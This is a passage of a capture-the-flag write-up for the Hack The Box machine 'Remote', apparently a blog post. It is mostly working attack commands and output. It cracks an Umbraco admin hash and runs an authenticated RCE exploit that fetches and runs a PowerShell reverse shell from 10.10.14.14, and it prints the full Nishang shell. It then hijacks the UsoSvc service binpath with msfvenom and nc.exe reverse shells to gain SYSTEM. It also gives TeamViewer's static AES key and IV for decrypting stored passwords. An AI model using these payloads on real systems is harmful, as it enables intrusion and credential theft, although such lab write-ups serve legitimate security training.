Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>Raw-SHA1 <span class="o">[</span>SHA1 256/256 AVX2 8x]<span class="o">)</span>
Warning: no OpenMP support <span class="k">for </span>this <span class="nb">hash type</span>, consider <span class="nt">--fork</span><span class="o">=</span>4
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
baconandcheese   <span class="o">(</span>?<span class="o">)</span>
1g 0:00:00:02 DONE <span class="o">(</span>2020-09-06 18:10<span class="o">)</span> 0.4878g/s 4792Kp/s 4792Kc/s 4792KC/s baconandchipies1..bacon918
Use the <span class="s2">"--show --format=Raw-SHA1"</span> options to display all of the cracked passwords reliably
Session completed
</pre></table></code></div></div><p>We get the password as <code class="language-plaintext highlighter-rouge">baconandcheese</code></p><p>Now we can login to Umbraco using <code class="language-plaintext highlighter-rouge">admin@htb.local</code>:<code class="language-plaintext highlighter-rouge">baconandcheese</code></p><h2 id="umbraco-exploit">Umbraco Exploit</h2><p>Successful login to Umbraco: As we click on the <code class="language-plaintext highlighter-rouge">help</code> button, we see the <code class="language-plaintext highlighter-rouge">Umbraco Version 7.12.4</code> based on this info we can search for exploits.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/Posts/Remote/page.png" alt="umbracopage" /></p><p>Using searchsploit we were able to find a possible authenticated exploit for Umbraco Version 7.12.4 same as our box on Exploit-DB: <a href="https://www.exploit-db.com/exploits/46153">https://www.exploit-db.com/exploits/46153</a></p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="go">cfx:  ~/Documents/htb/remote
→ searchsploit umbraco
Umbraco CMS - Remote Command Execution (Metasploit)                                                                  | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code   Execution                                                                     | aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                     | php/webapps/44988.txt
</span></pre></table></code></div></div><h3 id="modifying-the-exploit">Modifying the exploit</h3><p>The exploit needs some tweaking, We will make the following changes in the default exploit script to get us an reverse shell:</p><ul><li>login = “admin@htb.local”</li><li>password = “baconandcheese”</li><li>host = “http://10.10.10.180”</li><li>string cmd = “/c iex(iwr http://10.10.14.14:8000/rev.ps1 -usebasicparsing)”</li><li>proc.StartInfo.FileName = “powershell.exe”</li></ul><p>Here is the modified exploit:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>payload <span class="o">=</span> <span class="s1">'&lt;?xml version="1.0"?&gt;&lt;xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"&gt;\
&lt;msxsl:script language="C#" implements-prefix="csharp_user"&gt;public string xml() \
{ string cmd = "/c iex(iwr http://10.10.14.14:8000/rev.ps1 -usebasicparsing)"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 &lt;/msxsl:script&gt;&lt;xsl:template match="/"&gt; &lt;xsl:value-of select="csharp_user:xml()"/&gt;\
 &lt;/xsl:template&gt; &lt;/xsl:stylesheet&gt; '</span><span class="p">;</span>

login <span class="o">=</span> <span class="s2">"admin@htb.local"</span><span class="p">;</span>
<span class="nv">password</span><span class="o">=</span><span class="s2">"baconandcheese"</span><span class="p">;</span>
host <span class="o">=</span> <span class="s2">"http://10.10.10.180"</span><span class="p">;</span>
</pre></table></code></div></div><p>To sum it up, we have modified the payload which now uses <code class="language-plaintext highlighter-rouge">powershell.exe</code> with starting <code class="language-plaintext highlighter-rouge">cmd.exe</code> argument <code class="language-plaintext highlighter-rouge">-c</code> to download PowerShell reverse shell using <code class="language-plaintext highlighter-rouge">IWR</code>(Invoke-WebRequest) and execute it using <code class="language-plaintext highlighter-rouge">IEX</code> (Invoke-Expression).</p><p>The payload we are using is One-liner Nishang reverse TCP shell:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ <span class="nb">cat </span>rev.ps1
<span class="nv">$client</span> <span class="o">=</span> New-Object System.Net.Sockets.TCPClient<span class="o">(</span><span class="s1">'10.10.14.14'</span>,4444<span class="o">)</span><span class="p">;</span><span class="nv">$stream</span> <span class="o">=</span> <span class="nv">$client</span>.GetStream<span class="o">()</span><span class="p">;</span><span class="o">[</span>byte[]]<span class="nv">$bytes</span> <span class="o">=</span> 0..65535|%<span class="o">{</span>0<span class="o">}</span><span class="p">;</span><span class="k">while</span><span class="o">((</span><span class="nv">$i</span> <span class="o">=</span> <span class="nv">$stream</span>.Read<span class="o">(</span><span class="nv">$bytes</span>, 0, <span class="nv">$bytes</span>.Length<span class="o">))</span> <span class="nt">-ne</span> 0<span class="o">){</span><span class="p">;</span><span class="nv">$data</span> <span class="o">=</span> <span class="o">(</span>New-Object <span class="nt">-TypeName</span> System.Text.ASCIIEncoding<span class="o">)</span>.GetString<span class="o">(</span><span class="nv">$bytes</span>,0, <span class="nv">$i</span><span class="o">)</span><span class="p">;</span><span class="nv">$sendback</span> <span class="o">=</span> <span class="o">(</span>iex <span class="nv">$data</span> 2&gt;&amp;1 | Out-String <span class="o">)</span><span class="p">;</span><span class="nv">$sendback2</span>  <span class="o">=</span> <span class="nv">$sendback</span> + <span class="s1">'PS '</span> + <span class="o">(</span><span class="nb">pwd</span><span class="o">)</span>.Path + <span class="s1">'&gt; '</span><span class="p">;</span><span class="nv">$sendbyte</span> <span class="o">=</span> <span class="o">([</span>text.encoding]::ASCII<span class="o">)</span>.GetBytes<span class="o">(</span><span class="nv">$sendback2</span><span class="o">)</span><span class="p">;</span><span class="nv">$stream</span>.Write<span class="o">(</span><span class="nv">$sendbyte</span>,0,<span class="nv">$sendbyte</span>.Length<span class="o">)</span><span class="p">;</span><span class="nv">$stream</span>.Flush<span class="o">()}</span><span class="p">;</span><span class="nv">$client</span>.Close<span class="o">()</span>
</pre></table></code></div></div><h2 id="shell-as-defaultapppool">Shell as DefaultAppPool</h2><h3 id="executing-the-modified-exploit">Executing the modified exploit:</h3><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ python umbraco_rce.py
Start
<span class="o">[]</span>
</pre></table></code></div></div><h3 id="we-see-a-hit-on-our-http-server-for-our-payload-revps1">We see a hit on our http server for our payload rev.ps1</h3><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ python3 <span class="nt">-m</span> http.server
Serving HTTP on 0.0.0.0 port 8000 <span class="o">(</span>http://0.0.0.0:8000/<span class="o">)</span> ...
10.10.10.180 - - <span class="o">[</span>06/Sep/2020 19:03:59] <span class="s2">"GET /rev.ps1 HTTP/1.1"</span> 200 -
</pre></table></code></div></div><h3 id="getting-a-call-back-on-our-nc-listener">Getting a call back on our <code class="language-plaintext highlighter-rouge">nc</code> listener</h3><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ rlwrap nc <span class="nt">-lvnp</span> 4444
Ncat: Version 7.80 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.180.
Ncat: Connection from 10.10.10.180:49697.
<span class="nb">whoami
</span>iis apppool<span class="se">\d</span>efaultapppool
</pre></table></code></div></div><h3 id="user-flag">User Flag</h3><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic&gt; <span class="o">(</span>get-content user.txt<span class="o">)</span>.substring<span class="o">(</span>0,16<span class="o">)</span>
8c22011117becf95
PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic&gt; get-content user.txt
8c22011117becf95<span class="k">****************</span>
</pre></table></code></div></div><p>Inside the Public directory of Users, we can grab the <code class="language-plaintext highlighter-rouge">user.txt</code></p><h2 id="umbraco-exploit-by-noraj">Umbraco Exploit by <code class="language-plaintext highlighter-rouge">noraj</code></h2><p>We can also use Umbraco exploit by <code class="language-plaintext highlighter-rouge">noraj</code> available <a href="https://github.com/noraj/Umbraco-RCE"><strong>here</strong></a> It’s a similar exploit which takes all the inputs as arguments.</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote/Umbraco-RCE  |master ✓|
→ python exploit.py <span class="nt">-u</span> admin@htb.local <span class="nt">-p</span> baconandcheese <span class="nt">-i</span> <span class="s1">'http://10.10.10.180'</span> <span class="nt">-c</span> powershell.exe <span class="nt">-a</span> <span class="s2">"iex(iwr http://10.10.14.14:8000/rev.ps1 -usebasicparsing)"</span>

cfx:  ~/Documents/htb/remote
→ nc <span class="nt">-lvnp</span> 4444
Ncat: Version 7.80 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.180.
Ncat: Connection from 10.10.10.180:49730.
<span class="nb">whoami
</span>iis apppool<span class="se">\d</span>efaultapppool
PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt; <span class="nb">whoami
</span>iis apppool<span class="se">\d</span>efaultapppool
PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt; <span class="nb">exit</span>
</pre></table></code></div></div><h2 id="privilege-escalation">Privilege Escalation</h2><p>First we will transfer <code class="language-plaintext highlighter-rouge">winPEAS.exe</code> on the machine and run to discover possible local privilege escalation vectors:</p><p>We will use <code class="language-plaintext highlighter-rouge">iwr</code> to transfer the binary</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; iwr <span class="nt">-uri</span> http://10.10.14.14:8000/winPEAS.exe <span class="nt">-o</span> winpeas.exe
PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; ./winpeas.exe
</pre></table></code></div></div><p>Looking at the output of <code class="language-plaintext highlighter-rouge">winPEAS.exe</code>, two things seemed interesting to me:</p><ul><li>First, We have full to a service named as <code class="language-plaintext highlighter-rouge">UsoSvC</code></li></ul><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="go">[+] Modifiable Services
</span><span class="gp">   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#</span>services
<span class="go">    LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
    UsoSvc: AllAccess, Start
</span></pre></table></code></div></div><ul><li>Second, We see an outdated version of TeamViewer is installed and running on the machine:</li></ul><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="go">[+] Installed Applications --Via Program Files/Uninstall registry--
</span><span class="gp">[?] Check if you can modify installed software https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#</span>software
<span class="go">C:\Program Files (x86)\TeamViewer\Version7
</span></pre></table></code></div></div><h2 id="privesc-1-abusing-usosvc-service">PrivEsc 1: Abusing <strong>UsoSvc</strong> Service</h2><p>Since we have full access to <code class="language-plaintext highlighter-rouge">UsoSvc</code> service, we can modify the <code class="language-plaintext highlighter-rouge">binpath</code> of the service and pop us an reverse shell.</p><p><code class="language-plaintext highlighter-rouge">winPEAS</code> has also given us an article <a href="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services">https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services</a> on how to abuse services</p><ul><li>Method 1: We will create a malicious reverse shell payload with <code class="language-plaintext highlighter-rouge">msfvenom</code>, transfer it on the machine and change the <code class="language-plaintext highlighter-rouge">binpath</code> of <code class="language-plaintext highlighter-rouge">UsoSvC</code> with our reverse shell payload.</li></ul><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ msfvenom <span class="nt">-p</span> windows/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.14 <span class="nv">LPORT</span><span class="o">=</span>8021 <span class="nt">-f</span> exe <span class="nt">-o</span> priv.exe
<span class="o">[</span>-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
<span class="o">[</span>-] No <span class="nb">arch </span>selected, selecting <span class="nb">arch</span>: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: priv.exe
</pre></table></code></div></div><p>Transferring the payload:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; iwr <span class="nt">-uri</span> http://10.10.14.14:8000/priv.exe <span class="nt">-o</span> priv.exe

cfx:  ~/Documents/htb/remote
→ python3 <span class="nt">-m</span> http.server
Serving HTTP on 0.0.0.0 port 8000 <span class="o">(</span>http://0.0.0.0:8000/<span class="o">)</span> ...
10.10.10.180 - - <span class="o">[</span>06/Sep/2020 19:03:59] <span class="s2">"GET /rev.ps1 HTTP/1.1"</span> 200 -
10.10.10.180 - - <span class="o">[</span>06/Sep/2020 19:04:53] <span class="s2">"GET /winPEAS.exe HTTP/1.1"</span> 200 -
10.10.10.180 - - <span class="o">[</span>06/Sep/2020 19:15:44] <span class="s2">"GET /priv.exe HTTP/1.1"</span> 200 -
</pre></table></code></div></div><h3 id="changing-the-binpath">Changing the <code class="language-plaintext highlighter-rouge">binpath</code></h3><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre>PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; sc.exe config usosvc <span class="nv">binpath</span><span class="o">=</span><span class="s1">'C:\Windows\Temp\priv.exe'</span>
<span class="o">[</span>SC] ChangeServiceConfig SUCCESS

PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; sc.exe stop usosvc

SERVICE_NAME: usosvc
        TYPE               : 30  WIN32
        STATE              : 3  STOP_PENDING
                                <span class="o">(</span>NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN<span class="o">)</span>
        WIN32_EXIT_CODE    : 0  <span class="o">(</span>0x0<span class="o">)</span>
        SERVICE_EXIT_CODE  : 0  <span class="o">(</span>0x0<span class="o">)</span>
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530
PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; sc.exe stop usosvc
<span class="o">[</span>SC] ControlService FAILED 1062:

The service has not been started.

PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; sc.exe start usosvc
</pre></table></code></div></div><h3 id="shell-as-system">Shell as System:</h3><p>As soon as we start the <code class="language-plaintext highlighter-rouge">UsoSvc</code> service again we get a call back on our <code class="language-plaintext highlighter-rouge">nc</code> listener:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ nc <span class="nt">-lvnp</span> 8021
Ncat: Version 7.80 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::8021
Ncat: Listening on 0.0.0.0:8021
Ncat: Connection from 10.10.10.180.
Ncat: Connection from 10.10.10.180:49712.
Microsoft Windows <span class="o">[</span>Version 10.0.17763.107]
<span class="o">(</span>c<span class="o">)</span> 2018 Microsoft Corporation. All rights reserved.

C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami
<span class="nb">whoami
</span>nt authority<span class="se">\s</span>ystem

<span class="c">### Root Flag:</span>

<span class="sb">```</span>shell
C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;type root.txt
<span class="nb">type </span>root.txt
4963d8d771c1fb09<span class="k">****************</span>
</pre></table></code></div></div><ul><li>Method 2: We will transfer <code class="language-plaintext highlighter-rouge">nc.exe</code> binary on the machine, change the <code class="language-plaintext highlighter-rouge">binpath</code> and get us a PowerShell reverse shell.</li></ul><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre>PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; iwr <span class="nt">-uri</span> http://10.10.14.14:8000/nc.exe <span class="nt">-o</span> nc.exe

PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; sc.exe config usosvc <span class="nv">binpath</span><span class="o">=</span><span class="s1">'C:\Windows\Temp\nc.exe 10.10.14.14 8021 -e powershell.exe'</span>
<span class="o">[</span>SC] ChangeServiceConfig SUCCESS
PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; sc.exe stop usosvc
<span class="o">[</span>SC] ControlService FAILED 1062:

The service has not been started.

PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; sc.exe start usosvc


cfx:  ~/Documents/htb/remote
→ nc <span class="nt">-lvnp</span> 8021
Ncat: Version 7.80 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::8021
Ncat: Listening on 0.0.0.0:8021
Ncat: Connection from 10.10.10.180.
Ncat: Connection from 10.10.10.180:49718.
Windows PowerShell
Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved.

PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">whoami
whoami
</span>nt authority<span class="se">\s</span>ystem
</pre></table></code></div></div><h2 id="privesc-2-teamviewer">PrivEsc 2: TeamViewer</h2><p>Based on <code class="language-plaintext highlighter-rouge">winPEAS</code> output we can see an Outdated version7 of TV is installed &amp; running on the machine:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt; tasklist

Image Name                     PID Session Name        Session#    Mem Usage
<span class="o">=========================</span> <span class="o">========</span> <span class="o">================</span> <span class="o">===========</span> <span class="o">============</span>
System Idle Process              0                            0          8 K
System                           4                            0        140 K
Registry                       104                            0     23,380 K
smss.exe                       304                            0      1,212 K
csrss.exe                      404                            0      5,160 K
<span class="o">[</span>..SNIP..]
lsass.exe                      648                            0     14,804 K
svchost.exe                    772                            0      3,604 K
TeamViewer_Service.exe        2964                            0     20,096 K
VGAuthService.exe             3028                            0     10,068 K
vmtoolsd.exe                  3036                            0     18,348 K
</pre></table></code></div></div><p>I found an awesome article on TeamViewer <a href="https://whynotsecurity.com/blog/TeamViewer/"><strong>here</strong></a>. Apparently, TV uses static keys to encrypt/decrypt credentials.</p><p>These passwords are stored in Windows registry inside the value <code class="language-plaintext highlighter-rouge">SecurityPasswordAES</code> which we can extract and decrypt them using the known <code class="language-plaintext highlighter-rouge">KEY</code> &amp; <code class="language-plaintext highlighter-rouge">IV</code>.</p><h3 id="key-points">Key Points:</h3><ul><li>TeamViewer stores user passwords encrypted with AES-128-CBC</li><li>Key : 0602000000a400005253413100040000</li><li>IV : 0100010067244F436E6762F25EA8D704</li></ul><h3 id="extracting-password">Extracting Password</h3><p>A Quick search on Google reveals TeamViewer registry is under <code class="language-plaintext highlighter-rouge">HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7</code></p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre><td class="rouge-code"><pre>PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp&gt; reg query HKLM<span class="se">\S</span>OFTWARE<span class="se">\W</span>ow6432Node<span class="se">\T</span>eamViewer<span class="se">\V</span>ersion7

HKEY_LOCAL_MACHINE<span class="se">\S</span>OFTWARE<span class="se">\W</span>ow6432Node<span class="se">\T</span>eamViewer<span class="se">\V</span>ersion7
    StartMenuGroup    REG_SZ    TeamViewer 7
    InstallationDate    REG_SZ    2020-02-20
    InstallationDirectory    REG_SZ    C:<span class="se">\P</span>rogram Files <span class="o">(</span>x86<span class="o">)</span><span class="se">\T</span>eamViewer<span class="se">\V</span>ersion7
    Always_Online    REG_DWORD    0x1
    Security_ActivateDirectIn    REG_DWORD    0x0
    Version    REG_SZ    7.0.43148
    ClientIC    REG_DWORD    0x11f25831
    PK    REG_BINARY    BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
    SK    REG_BINARY    F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
    LastMACUsed    REG_MULTI_SZ    <span class="se">\0</span>005056B984A8
    MIDInitiativeGUID    REG_SZ    <span class="o">{</span>514ed376-a4ee-4507-a28b-484604ed0ba0<span class="o">}</span>
    MIDVersion    REG_DWORD    0x1
    ClientID    REG_DWORD    0x6972e4aa
    CUse    REG_DWORD    0x1
    LastUpdateCheck    REG_DWORD    0x5e72893c
    UsageEnvironmentBackup    REG_DWORD    0x1
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs    REG_MULTI_SZ    admin
    MultiPwdMgmtPWDs    REG_MULTI_SZ    357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength    REG_DWORD    0x3
</pre></table></code></div></div><p>The value what we need is <code class="language-plaintext highlighter-rouge">SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B</code></p><h3 id="decrypt-script">Decrypt Script</h3><p>The author has published a python script to decrypt the password on the blog or you can also find the script on <a href="https://github.com/ColdFusionX/CTF-Scripts/tree/master/HTB/Remote"><strong>my github</strong></a></p><p>We just need to replace the <code class="language-plaintext highlighter-rouge">hex_str_cipher</code> value with the encrypted data value we found inside <code class="language-plaintext highlighter-rouge">SecurityPasswordAES</code> and run the script.</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre><span class="n">cfx</span><span class="p">:</span>  <span class="o">~/</span><span class="n">Documents</span><span class="o">/</span><span class="n">htb</span><span class="o">/</span><span class="n">remote</span>
<span class="err">→</span> <span class="n">cat</span> <span class="n">TeamViewer_hash_decrypt</span><span class="p">.</span><span class="n">py</span>
<span class="kn">import</span> <span class="nn">sys</span><span class="p">,</span> <span class="n">hexdump</span><span class="p">,</span> <span class="n">binascii</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>

<span class="k">class</span> <span class="nc">AESCipher</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">key</span> <span class="o">=</span> <span class="n">key</span>

    <span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">iv</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
        <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">cipher</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>

<span class="n">key</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">"0602000000a400005253413100040000"</span><span class="p">)</span>
